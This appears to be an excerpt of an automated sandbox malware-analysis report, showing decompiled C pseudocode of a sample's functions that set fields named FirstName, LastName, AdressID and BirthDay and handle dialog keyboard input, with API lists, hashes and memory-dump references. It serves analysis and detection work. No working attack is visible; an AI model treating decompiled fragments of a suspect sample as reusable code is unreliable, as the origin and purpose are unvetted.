				if( *_t182() < 0) {
					E0041FC30(_t145);
				}
				 *((short*)(_t235 - 0x40)) = 8;
				 *((intOrPtr*)(_t235 - 0x38)) = E0041FCB0(_t213, "BirthDay");
				 *(_t235 - 4) = 0xc;
				_t147 = E004061D9(_t235 - 0x60,  *((intOrPtr*)(_t229 + 0x110)));
				 *(_t235 - 4) = 0xd;
				_t150 = E00406A15(E0040669E(0x458420), _t235 - 0x20);
				 *(_t235 - 4) = 0xe;
				_t152 = E004069CF(E0040669E(_t150), _t235 - 0x1c, _t235 - 0x40);
				 *(_t235 - 4) = 0xf;
				E004062B5(E0040669E(_t152), _t147);
				_t155 =  *((intOrPtr*)(_t235 - 0x1c));
				 *(_t235 - 4) = 0xe;
				if(_t155 != 0) {
					 *((intOrPtr*)( *_t155 + 8))(_t155);
				}
				_t156 =  *((intOrPtr*)(_t235 - 0x20));
				 *(_t235 - 4) = 0xd;
				if(_t156 != 0) {
					 *((intOrPtr*)( *_t156 + 8))(_t156);
				}
				_push(_t235 - 0x60);
				 *(_t235 - 4) = 0xc;
				if( *_t182() < 0) {
					E0041FC30(_t158);
				}
				 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
				_push(_t235 - 0x40);
				if( *_t182() < 0) {
					E0041FC30(_t160);
				}
				_t163 = E00406479(E0040669E(0x458420), 0x458040, 0x458040);
				 *[fs:0x0] =  *((intOrPtr*)(_t235 - 0xc));
				return _t163;
			}

























                                                                              0x00406a50
                                                                              0x00406a5b
                                                                              0x00406a5d
                                                                              0x00406a5f
                                                                              0x00406a79
                                                                              0x00406a83
                                                                              0x00406a8e
                                                                              0x00406a97
                                                                              0x00406a9e
                                                                              0x00406aab
                                                                              0x00406ab6
                                                                              0x00406ac5
                                                                              0x00406ad0
                                                                              0x00406ad8
                                                                              0x00406ae1
                                                                              0x00406ae3
                                                                              0x00406ae8
                                                                              0x00406aed
                                                                              0x00406af1
                                                                              0x00406af3
                                                                              0x00406af6
                                                                              0x00406af6
                                                                              0x00406af9
                                                                              0x00406afe
                                                                              0x00406b02
                                                                              0x00406b04
                                                                              0x00406b07
                                                                              0x00406b07
                                                                              0x00406b0a
                                                                              0x00406b13
                                                                              0x00406b14
                                                                              0x00406b1c
                                                                              0x00406b1f
                                                                              0x00406b1f
                                                                              0x00406b24
                                                                              0x00406b2b
                                                                              0x00406b30
                                                                              0x00406b33
                                                                              0x00406b33
                                                                              0x00406b3d
                                                                              0x00406b48
                                                                              0x00406b54
                                                                              0x00406b60
                                                                              0x00406b69
                                                                              0x00406b74
                                                                              0x00406b83
                                                                              0x00406b8e
                                                                              0x00406b98
                                                                              0x00406ba1
                                                                              0x00406ba3
                                                                              0x00406ba8
                                                                              0x00406bad
                                                                              0x00406bb1
                                                                              0x00406bb3
                                                                              0x00406bb6
                                                                              0x00406bb6
                                                                              0x00406bb9
                                                                              0x00406bbe
                                                                              0x00406bc2
                                                                              0x00406bc4
                                                                              0x00406bc7
                                                                              0x00406bc7
                                                                              0x00406bcd
                                                                              0x00406bce
                                                                              0x00406bd6
                                                                              0x00406bd9
                                                                              0x00406bd9
                                                                              0x00406bde
                                                                              0x00406be5
                                                                              0x00406bea
                                                                              0x00406bed
                                                                              0x00406bed
                                                                              0x00406bf7
                                                                              0x00406c02
                                                                              0x00406c0e
                                                                              0x00406c1a
                                                                              0x00406c23
                                                                              0x00406c2e
                                                                              0x00406c3d
                                                                              0x00406c48
                                                                              0x00406c52
                                                                              0x00406c5b
                                                                              0x00406c5d
                                                                              0x00406c62
                                                                              0x00406c67
                                                                              0x00406c6b
                                                                              0x00406c6d
                                                                              0x00406c70
                                                                              0x00406c70
                                                                              0x00406c73
                                                                              0x00406c78
                                                                              0x00406c7c
                                                                              0x00406c7e
                                                                              0x00406c81
                                                                              0x00406c81
                                                                              0x00406c87
                                                                              0x00406c88
                                                                              0x00406c90
                                                                              0x00406c93
                                                                              0x00406c93
                                                                              0x00406c98
                                                                              0x00406c9f
                                                                              0x00406ca4
                                                                              0x00406ca7
                                                                              0x00406ca7
                                                                              0x00406cb1
                                                                              0x00406cbc
                                                                              0x00406cc8
                                                                              0x00406ccf
                                                                              0x00406cdc
                                                                              0x00406ce7
                                                                              0x00406cf6
                                                                              0x00406d01
                                                                              0x00406d09
                                                                              0x00406d14
                                                                              0x00406d19
                                                                              0x00406d1e
                                                                              0x00406d22
                                                                              0x00406d27
                                                                              0x00406d27
                                                                              0x00406d2a
                                                                              0x00406d2f
                                                                              0x00406d33
                                                                              0x00406d38
                                                                              0x00406d38
                                                                              0x00406d3e
                                                                              0x00406d3f
                                                                              0x00406d47
                                                                              0x00406d4a
                                                                              0x00406d4a
                                                                              0x00406d4f
                                                                              0x00406d56
                                                                              0x00406d5b
                                                                              0x00406d5e
                                                                              0x00406d5e
                                                                              0x00406d73
                                                                              0x00406d7e
                                                                              0x00406d86

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00406A50
                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • VariantClear.OLEAUT32(?), ref: 00406B18
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406B2C
                                                                              • VariantClear.OLEAUT32(?), ref: 00406BD2
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406BE6
                                                                              • VariantClear.OLEAUT32(?), ref: 00406C8C
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406CA0
                                                                              • VariantClear.OLEAUT32(?), ref: 00406D43
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406D57
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant$H_prolog$ByteCharMultiWidelstrlen
                                                                              • String ID: AdressID$BirthDay$FirstName$LastName
                                                                              • API String ID: 1096505026-934635829
                                                                              • Opcode ID: f138b5058df17c204c0022bf0a240c6d99a45a3229c88d5b74d157336ca80105
                                                                              • Instruction ID: e5dcb4fd0207a17bfa72141c2bedb9427cf29cf0c9c24e4773d7023e17c05364
                                                                              • Opcode Fuzzy Hash: f138b5058df17c204c0022bf0a240c6d99a45a3229c88d5b74d157336ca80105
                                                                              • Instruction Fuzzy Hash: A7A17570A00249DBDF04EBF9C955BAEB7B8AF44308F14446EA406F72C1EF7C9A158769
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00406D87, Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 269COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E00406D87(void* __ecx) {
				void* _t99;
				void* _t102;
				void* _t104;
				intOrPtr* _t107;
				intOrPtr* _t108;
				void* _t117;
				void* _t119;
				intOrPtr* _t122;
				intOrPtr* _t123;
				void* _t132;
				void* _t134;
				intOrPtr* _t137;
				intOrPtr* _t138;
				void* _t144;
				void* _t147;
				void* _t149;
				intOrPtr* _t152;
				intOrPtr* _t153;
				void* _t160;
				intOrPtr* _t179;
				void* _t224;
				void* _t230;

				E004128A0(E00430A8E, _t230);
				_push(1);
				_t224 = __ecx;
				E00425C57(__ecx);
				 *((short*)(_t230 - 0x30)) = 8;
				 *((intOrPtr*)(_t230 - 0x28)) = E0041FCB0(__ecx, "AdressID");
				 *(_t230 - 4) =  *(_t230 - 4) & 0x00000000;
				_t99 = E004061D9(_t230 - 0x50,  *((intOrPtr*)(__ecx + 0x11c)));
				 *(_t230 - 4) = 1;
				_t102 = E00406A15(E0040669E(0x458420), _t230 - 0x14);
				 *(_t230 - 4) = 2;
				_t104 = E004069CF(E0040669E(_t102), _t230 - 0x10, _t230 - 0x30);
				 *(_t230 - 4) = 3;
				_t190 = E0040669E(_t104);
				E004062B5(_t105, _t99);
				_t107 =  *((intOrPtr*)(_t230 - 0x10));
				 *(_t230 - 4) = 2;
				if(_t107 != 0) {
					_t190 =  *_t107;
					 *((intOrPtr*)( *_t107 + 8))(_t107);
				}
				_t108 =  *((intOrPtr*)(_t230 - 0x14));
				 *(_t230 - 4) = 1;
				if(_t108 != 0) {
					_t190 =  *_t108;
					 *((intOrPtr*)( *_t108 + 8))(_t108);
				}
				_t179 = __imp__#9;
				_push(_t230 - 0x50);
				 *(_t230 - 4) = 0;
				if( *_t179() < 0) {
					E0041FC30(_t110);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x30);
				if( *_t179() < 0) {
					E0041FC30(_t112);
				}
				 *((short*)(_t230 - 0x30)) = 8;
				 *((intOrPtr*)(_t230 - 0x28)) = E0041FCB0(_t190, "FirstName");
				 *(_t230 - 4) = 4;
				 *((intOrPtr*)(_t230 - 0x14)) = E004061D9(_t230 - 0x50,  *((intOrPtr*)(_t224 + 0x114)));
				 *(_t230 - 4) = 5;
				_t117 = E00406A15(E0040669E(0x458420), _t230 - 0x18);
				 *(_t230 - 4) = 6;
				_t119 = E004069CF(E0040669E(_t117), _t230 - 0x10, _t230 - 0x30);
				 *(_t230 - 4) = 7;
				_t199 = E0040669E(_t119);
				E004062B5(_t120,  *((intOrPtr*)(_t230 - 0x14)));
				_t122 =  *((intOrPtr*)(_t230 - 0x10));
				 *(_t230 - 4) = 6;
				if(_t122 != 0) {
					_t199 =  *_t122;
					 *((intOrPtr*)( *_t122 + 8))(_t122);
				}
				_t123 =  *((intOrPtr*)(_t230 - 0x18));
				 *(_t230 - 4) = 5;
				if(_t123 != 0) {
					_t199 =  *_t123;
					 *((intOrPtr*)( *_t123 + 8))(_t123);
				}
				_push(_t230 - 0x50);
				 *(_t230 - 4) = 4;
				if( *_t179() < 0) {
					E0041FC30(_t125);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x30);
				if( *_t179() < 0) {
					E0041FC30(_t127);
				}
				 *((short*)(_t230 - 0x30)) = 8;
				 *((intOrPtr*)(_t230 - 0x28)) = E0041FCB0(_t199, "LastName");
				 *(_t230 - 4) = 8;
				 *((intOrPtr*)(_t230 - 0x18)) = E004061D9(_t230 - 0x50,  *((intOrPtr*)(_t224 + 0x118)));
				 *(_t230 - 4) = 9;
				_t132 = E00406A15(E0040669E(0x458420), _t230 - 0x10);
				 *(_t230 - 4) = 0xa;
				_t134 = E004069CF(E0040669E(_t132), _t230 - 0x14, _t230 - 0x30);
				 *(_t230 - 4) = 0xb;
				_t208 = E0040669E(_t134);
				E004062B5(_t135,  *((intOrPtr*)(_t230 - 0x18)));
				_t137 =  *((intOrPtr*)(_t230 - 0x14));
				 *(_t230 - 4) = 0xa;
				if(_t137 != 0) {
					_t208 =  *_t137;
					 *((intOrPtr*)( *_t137 + 8))(_t137);
				}
				_t138 =  *((intOrPtr*)(_t230 - 0x10));
				 *(_t230 - 4) = 9;
				if(_t138 != 0) {
					_t208 =  *_t138;
					 *((intOrPtr*)( *_t138 + 8))(_t138);
				}
				_push(_t230 - 0x50);
				 *(_t230 - 4) = 8;
				if( *_t179() < 0) {
					E0041FC30(_t140);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x30);
				if( *_t179() < 0) {
					E0041FC30(_t142);
				}
				 *((short*)(_t230 - 0x40)) = 8;
				 *((intOrPtr*)(_t230 - 0x38)) = E0041FCB0(_t208, "BirthDay");
				 *(_t230 - 4) = 0xc;
				_t144 = E004061D9(_t230 - 0x60,  *((intOrPtr*)(_t224 + 0x110)));
				 *(_t230 - 4) = 0xd;
				_t147 = E00406A15(E0040669E(0x458420), _t230 - 0x20);
				 *(_t230 - 4) = 0xe;
				_t149 = E004069CF(E0040669E(_t147), _t230 - 0x1c, _t230 - 0x40);
				 *(_t230 - 4) = 0xf;
				E004062B5(E0040669E(_t149), _t144);
				_t152 =  *((intOrPtr*)(_t230 - 0x1c));
				 *(_t230 - 4) = 0xe;
				if(_t152 != 0) {
					 *((intOrPtr*)( *_t152 + 8))(_t152);
				}
				_t153 =  *((intOrPtr*)(_t230 - 0x20));
				 *(_t230 - 4) = 0xd;
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
				}
				_push(_t230 - 0x60);
				 *(_t230 - 4) = 0xc;
				if( *_t179() < 0) {
					E0041FC30(_t155);
				}
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				_push(_t230 - 0x40);
				if( *_t179() < 0) {
					E0041FC30(_t157);
				}
				_t160 = E00406479(E0040669E(0x458420), 0x458040, 0x458040);
				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
				return _t160;
			}

























                                                                              0x00406d8c
                                                                              0x00406d97
                                                                              0x00406d99
                                                                              0x00406d9b
                                                                              0x00406da5
                                                                              0x00406db0
                                                                              0x00406db9
                                                                              0x00406dc0
                                                                              0x00406dd2
                                                                              0x00406ddd
                                                                              0x00406dec
                                                                              0x00406df7
                                                                              0x00406dff
                                                                              0x00406e08
                                                                              0x00406e0a
                                                                              0x00406e0f
                                                                              0x00406e14
                                                                              0x00406e18
                                                                              0x00406e1a
                                                                              0x00406e1d
                                                                              0x00406e1d
                                                                              0x00406e20
                                                                              0x00406e25
                                                                              0x00406e29
                                                                              0x00406e2b
                                                                              0x00406e2e
                                                                              0x00406e2e
                                                                              0x00406e31
                                                                              0x00406e3a
                                                                              0x00406e3b
                                                                              0x00406e43
                                                                              0x00406e46
                                                                              0x00406e46
                                                                              0x00406e4b
                                                                              0x00406e52
                                                                              0x00406e57
                                                                              0x00406e5a
                                                                              0x00406e5a
                                                                              0x00406e64
                                                                              0x00406e6f
                                                                              0x00406e7b
                                                                              0x00406e87
                                                                              0x00406e90
                                                                              0x00406e9b
                                                                              0x00406eaa
                                                                              0x00406eb5
                                                                              0x00406ebf
                                                                              0x00406ec8
                                                                              0x00406eca
                                                                              0x00406ecf
                                                                              0x00406ed4
                                                                              0x00406ed8
                                                                              0x00406eda
                                                                              0x00406edd
                                                                              0x00406edd
                                                                              0x00406ee0
                                                                              0x00406ee5
                                                                              0x00406ee9
                                                                              0x00406eeb
                                                                              0x00406eee
                                                                              0x00406eee
                                                                              0x00406ef4
                                                                              0x00406ef5
                                                                              0x00406efd
                                                                              0x00406f00
                                                                              0x00406f00
                                                                              0x00406f05
                                                                              0x00406f0c
                                                                              0x00406f11
                                                                              0x00406f14
                                                                              0x00406f14
                                                                              0x00406f1e
                                                                              0x00406f29
                                                                              0x00406f35
                                                                              0x00406f41
                                                                              0x00406f4a
                                                                              0x00406f55
                                                                              0x00406f64
                                                                              0x00406f6f
                                                                              0x00406f79
                                                                              0x00406f82
                                                                              0x00406f84
                                                                              0x00406f89
                                                                              0x00406f8e
                                                                              0x00406f92
                                                                              0x00406f94
                                                                              0x00406f97
                                                                              0x00406f97
                                                                              0x00406f9a
                                                                              0x00406f9f
                                                                              0x00406fa3
                                                                              0x00406fa5
                                                                              0x00406fa8
                                                                              0x00406fa8
                                                                              0x00406fae
                                                                              0x00406faf
                                                                              0x00406fb7
                                                                              0x00406fba
                                                                              0x00406fba
                                                                              0x00406fbf
                                                                              0x00406fc6
                                                                              0x00406fcb
                                                                              0x00406fce
                                                                              0x00406fce
                                                                              0x00406fd8
                                                                              0x00406fe3
                                                                              0x00406fef
                                                                              0x00406ff6
                                                                              0x00407003
                                                                              0x0040700e
                                                                              0x0040701d
                                                                              0x00407028
                                                                              0x00407030
                                                                              0x0040703b
                                                                              0x00407040
                                                                              0x00407045
                                                                              0x00407049
                                                                              0x0040704e
                                                                              0x0040704e
                                                                              0x00407051
                                                                              0x00407056
                                                                              0x0040705a
                                                                              0x0040705f
                                                                              0x0040705f
                                                                              0x00407065
                                                                              0x00407066
                                                                              0x0040706e
                                                                              0x00407071
                                                                              0x00407071
                                                                              0x00407076
                                                                              0x0040707d
                                                                              0x00407082
                                                                              0x00407085
                                                                              0x00407085
                                                                              0x0040709a
                                                                              0x004070a5
                                                                              0x004070ad

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00406D8C
                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                              • VariantClear.OLEAUT32(?), ref: 00406E3F
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406E53
                                                                              • VariantClear.OLEAUT32(?), ref: 00406EF9
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406F0D
                                                                              • VariantClear.OLEAUT32(?), ref: 00406FB3
                                                                              • VariantClear.OLEAUT32(00000008), ref: 00406FC7
                                                                              • VariantClear.OLEAUT32(?), ref: 0040706A
                                                                              • VariantClear.OLEAUT32(00000008), ref: 0040707E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant$H_prolog$ByteCharMultiWidelstrlen
                                                                              • String ID: AdressID$BirthDay$FirstName$LastName
                                                                              • API String ID: 1096505026-934635829
                                                                              • Opcode ID: 9d33b65be6b7bab757115e18c74b9ab704943c0dda13e8b3f3a8995022b2b678
                                                                              • Instruction ID: b3793917955f3ec542d11301d8d5840c5ed7146996fc9de46d777ad14273860a
                                                                              • Opcode Fuzzy Hash: 9d33b65be6b7bab757115e18c74b9ab704943c0dda13e8b3f3a8995022b2b678
                                                                              • Instruction Fuzzy Hash: F5A18570A00209EBCF04EBF5C955BEEB7B96F44308F14446EA406F72C1EF799A158769
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004110A7, Relevance: 22.9, APIs: 15, Instructions: 359windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E004110A7() {
				void* __ebx;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				signed char _t119;
				signed int _t122;
				signed int _t123;
				signed int _t127;
				void* _t132;
				signed char _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed char _t147;
				intOrPtr _t148;
				signed int _t149;
				short _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t163;
				signed char _t164;
				signed int _t165;
				signed int _t166;
				short _t169;
				WPARAM _t171;
				signed int _t172;
				intOrPtr* _t173;
				void* _t174;
				signed int _t186;
				void* _t189;
				signed int _t191;
				WPARAM _t203;
				struct tagMSG* _t208;
				signed int _t209;
				signed int _t211;
				int _t213;
				signed int _t214;
				int _t217;
				signed int _t218;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t228;

				E004128A0(E0043132A, _t226);
				_t112 =  *(_t226 + 8);
				 *((intOrPtr*)(_t226 - 0x10)) = _t228 - 0x20;
				if(_t112 != 0) {
					 *(_t226 - 0x28) =  *(_t112 + 0x1c);
				} else {
					 *(_t226 - 0x28) =  *(_t226 - 0x28) & _t112;
				}
				_t208 =  *(_t226 + 0xc);
				_t217 = _t208->message;
				 *(_t226 - 0x18) = _t217;
				 *(_t226 - 0x2c) = GetFocus();
				_t115 = E00426406(_t226, _t114);
				 *(_t226 - 0x14) = _t115;
				if(_t217 < 0x100 || _t217 > 0x109) {
					if(_t217 < 0x200 || _t217 > 0x209) {
						goto L27;
					} else {
						goto L7;
					}
				} else {
					L7:
					if(_t115 == 0) {
						L27:
						 *((intOrPtr*)(_t226 - 0x1c)) = E00426406(_t226, _t208->hwnd);
						_t218 = 0;
						 *(_t226 - 0x24) =  *(_t226 - 0x24) & 0;
						_t118 =  *(_t226 - 0x18) - 0x100;
						__eflags = _t118;
						 *((intOrPtr*)(_t226 - 0x20)) = 2;
						if(_t118 == 0) {
							_t119 = E0041092D( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							_t186 = _t208->wParam & 0x0000ffff;
							__eflags = _t186 - 0x1b;
							if(__eflags > 0) {
								__eflags = _t186 - 0x25;
								if(_t186 < 0x25) {
									L47:
									_t209 = IsDialogMessageA( *( *(_t226 + 8) + 0x1c),  *(_t226 + 0xc));
									__eflags = _t209;
									if(_t209 != 0) {
										_t132 = E00426406(_t226, GetFocus());
										__eflags = _t132 -  *(_t226 - 0x14);
										if(_t132 !=  *(_t226 - 0x14)) {
											E00410DAC(E00426406(_t226, GetFocus()));
										}
									}
									L50:
									_t122 = IsWindow( *(_t226 - 0x2c));
									__eflags = _t122;
									if(_t122 != 0) {
										E00410E19( *(_t226 - 0x14), E00426406(_t226, GetFocus()));
										_pop(_t189);
										_t127 = IsWindow( *(_t226 - 0x28));
										__eflags = _t127;
										if(_t127 != 0) {
											E00410FC7(_t189,  *(_t226 + 8),  *(_t226 - 0x14), E00426406(_t226, GetFocus()));
										}
									}
									_t123 = _t209;
									goto L54;
								}
								__eflags = _t186 - 0x26;
								if(_t186 <= 0x26) {
									 *(_t226 - 0x24) = 1;
									L81:
									_t136 = E0041092D( *(_t226 - 0x14), _t208);
									__eflags = _t136 & 0x00000001;
									if((_t136 & 0x00000001) != 0) {
										goto L47;
									}
									__eflags =  *(_t226 - 0x24);
									_t191 =  *(_t226 + 8);
									_push(0);
									if( *(_t226 - 0x24) == 0) {
										_t137 = E004287C4(_t191);
									} else {
										_t137 = E004286C8(_t191);
									}
									_t222 = _t137;
									__eflags = _t222;
									if(_t222 == 0) {
										goto L47;
									} else {
										__eflags =  *(_t222 + 8);
										if( *(_t222 + 8) != 0) {
											E004288C0( *(_t226 + 8), _t222);
										}
										__eflags =  *(_t222 + 4);
										if( *(_t222 + 4) == 0) {
											_t138 =  *_t222;
											__eflags = _t138;
											if(_t138 == 0) {
												_t139 = E004109DC( *(_t226 + 8),  *(_t226 - 0x14),  *(_t226 - 0x24));
											} else {
												_t139 = E00426406(_t226, _t138);
											}
											_t211 = _t139;
											__eflags = _t211;
											if(_t211 == 0) {
												goto L47;
											} else {
												 *((intOrPtr*)( *((intOrPtr*)( *(_t226 + 8) + 0x48)) + 0x6c)) = 0;
												E00410A16(_t211);
												__eflags =  *(_t222 + 8);
												if( *(_t222 + 8) != 0) {
													SendMessageA( *(_t211 + 0x1c), 0xf1, 1, 0);
												}
												goto L90;
											}
										} else {
											 *((intOrPtr*)( *( *(_t222 + 4)) + 0xac))(_t208);
											L90:
											_t209 = 1;
											goto L50;
										}
									}
								}
								__eflags = _t186 - 0x28;
								if(_t186 <= 0x28) {
									goto L81;
								}
								__eflags = _t186 - 0x2b;
								if(_t186 != 0x2b) {
									goto L47;
								}
								L68:
								__eflags = _t119 & 0x00000004;
								if((_t119 & 0x00000004) != 0) {
									goto L47;
								}
								_t147 = E004109BB( *(_t226 - 0x14));
								__eflags = _t147 & 0x00000010;
								if((_t147 & 0x00000010) == 0) {
									_t148 = E00410F9A( *(_t226 + 8));
								} else {
									_t218 =  *(_t226 - 0x14);
									_t148 = E004283CA(_t218);
								}
								_t213 = 0;
								__eflags = _t218;
								 *((intOrPtr*)(_t226 - 0x20)) = _t148;
								if(_t218 != 0) {
									L76:
									_t149 = E00428444(_t218);
									__eflags = _t149;
									if(_t149 != 0) {
										__eflags =  *((intOrPtr*)(_t218 + 0x4c)) - _t213;
										if( *((intOrPtr*)(_t218 + 0x4c)) == _t213) {
											goto L47;
										}
										_push(_t213);
										_push(_t213);
										_push(_t213);
										_push(1);
										_push(0xfffffdd9);
										_push(_t218);
										 *(_t226 - 4) = _t213;
										E004284A1();
										 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
										goto L90;
									}
									MessageBeep(_t213);
									goto L47;
								} else {
									L75:
									_t218 = E00410E94( *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x20)));
									__eflags = _t218 - _t213;
									if(_t218 == _t213) {
										goto L47;
									}
									goto L76;
								}
							}
							if(__eflags == 0) {
								L74:
								_t213 = 0;
								__eflags = 0;
								goto L75;
							}
							__eflags = _t186 - 3;
							if(_t186 == 3) {
								goto L74;
							}
							__eflags = _t186 - 9;
							if(_t186 == 9) {
								__eflags = _t119 & 0x00000002;
								if((_t119 & 0x00000002) != 0) {
									goto L47;
								}
								_t153 = GetKeyState(0x10);
								_t223 =  *(_t226 + 8);
								__eflags = _t153;
								_t185 = 0 | _t153 < 0x00000000;
								_t154 = E004285EC(_t223, 0, _t153 < 0);
								__eflags = _t154;
								if(_t154 == 0) {
									goto L47;
								}
								__eflags =  *(_t154 + 4);
								if( *(_t154 + 4) == 0) {
									_t155 =  *_t154;
									__eflags = _t155;
									if(_t155 == 0) {
										_t156 = E004083B5(_t223,  *((intOrPtr*)(_t226 - 0x1c)), _t185);
									} else {
										_t156 = E00426406(_t226, _t155);
									}
									_t214 = _t156;
									__eflags = _t214;
									if(_t214 != 0) {
										 *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) =  *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) & 0x00000000;
										E00410A16(_t214);
										E00410E19( *(_t226 - 0x14), _t214);
									}
								} else {
									 *((intOrPtr*)( *( *(_t154 + 4)) + 0xac))(_t208);
								}
								goto L90;
							}
							__eflags = _t186 - 0xd;
							if(_t186 == 0xd) {
								goto L68;
							}
							goto L47;
						}
						_t163 = _t118;
						__eflags = _t163;
						if(_t163 == 0) {
							L33:
							_t164 = E0041092D( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								L35:
								_t203 = _t208->wParam;
								__eflags = _t203 - 9;
								if(_t203 != 9) {
									L37:
									__eflags = _t203 - 0x20;
									if(__eflags != 0) {
										_t165 = E00410CD1(0x100, _t203, __eflags,  *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x1c)), _t208);
										__eflags = _t165;
										if(_t165 == 0) {
											goto L47;
										}
										_t166 =  *(_t165 + 4);
										__eflags = _t166;
										if(_t166 == 0) {
											goto L47;
										} else {
											E0040BABF(_t166, _t208);
											goto L90;
										}
									}
									goto L38;
								}
								__eflags = _t164 & 0x00000002;
								if((_t164 & 0x00000002) != 0) {
									goto L47;
								}
								goto L37;
							}
							__eflags = _t164 & 0x00000084;
							if((_t164 & 0x00000084) != 0) {
								goto L47;
							}
							goto L35;
						}
						__eflags = _t163 != 4;
						if(_t163 != 4) {
							goto L47;
						}
						__eflags =  *(_t226 - 0x14);
						if( *(_t226 - 0x14) != 0) {
							L32:
							__eflags = _t208->wParam - 0x20;
							if(_t208->wParam == 0x20) {
								goto L47;
							}
							goto L33;
						}
						_t169 = GetKeyState(0x12);
						__eflags = _t169;
						if(_t169 >= 0) {
							goto L47;
						}
						goto L32;
					} else {
						_t224 =  *(_t226 - 0x14);
						while( *(_t224 + 0x4c) == 0 && E00426406(_t226, GetParent( *(_t224 + 0x1c))) !=  *(_t226 + 8)) {
							_t224 = E00426406(_t226, GetParent( *(_t224 + 0x1c)));
							if(_t224 != 0) {
								continue;
							}
							break;
						}
						if(_t224 == 0) {
							L17:
							__eflags =  *(_t226 - 0x18) - 0x101;
							if( *(_t226 - 0x18) == 0x101) {
								L20:
								__eflags = _t224;
								if(_t224 == 0) {
									L26:
									_t208 =  *(_t226 + 0xc);
									goto L27;
								}
								_t225 =  *(_t224 + 0x4c);
								__eflags = _t225;
								if(_t225 == 0) {
									goto L26;
								}
								_t171 =  *(_t226 + 0xc)->wParam;
								__eflags = _t171 - 0xd;
								if(_t171 != 0xd) {
									L24:
									__eflags = _t171 - 0x1b;
									if(_t171 != 0x1b) {
										goto L26;
									}
									__eflags =  *(_t225 + 0x80) & 0x00000002;
									if(( *(_t225 + 0x80) & 0x00000002) != 0) {
										L38:
										_t123 = 0;
										L54:
										 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
										return _t123;
									}
									goto L26;
								}
								__eflags =  *(_t225 + 0x80) & 0x00000001;
								if(( *(_t225 + 0x80) & 0x00000001) != 0) {
									goto L38;
								}
								goto L24;
							}
							__eflags =  *(_t226 - 0x18) - 0x100;
							if( *(_t226 - 0x18) == 0x100) {
								goto L20;
							}
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								goto L26;
							}
							goto L20;
						}
						_t172 =  *(_t224 + 0x4c);
